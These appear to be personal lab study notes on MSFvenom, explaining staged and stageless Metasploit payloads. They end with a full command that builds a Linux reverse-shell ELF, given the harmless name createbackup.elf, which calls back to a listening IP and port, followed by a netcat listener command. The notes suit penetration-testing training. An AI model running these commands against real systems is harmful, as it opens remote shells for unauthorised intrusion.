Practicing with MSFvenom

msfvenom -l payloads —→ To list all payloads

Payload naming convention almost always starts by listing the OS of the target (Linux, Windows, MacOS, mainframe, etc...).

Staged vs. Stageless Payloads

https://www.rapid7.com/blog/post/2015/03/25/stageless-meterpreter-payloads/

Staged Payloads

• Payload will send a small stage that will be executed on the target and then call back to the attack box to download the remainder of the payload over the network, then executes the shellcode to establish a reverse shell.
• linux/x86/shell/reverse_tcp is a staged payload, and we can tell from the name since each / in its name represents a stage from the shell forward. So /shell/ is a stage to send, and /reverse_tcp is another.

Stageless Payloads

• Payload will be sent in its entirety across a network connection without a stage.
• Benefit us in environments where we do not have access to much bandwidth and latency can interfere.
• linux/zarch/meterpreter_reverse_tcp It is similar to the staged payload except that it specifies the architecture it affects, then it has the shell payload and network communications all within the same function /meterpreter_reverse_tcp.

Building A Stageless Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 -f elf > createbackup.elf

NC Connection

sudo nc -lvnp 443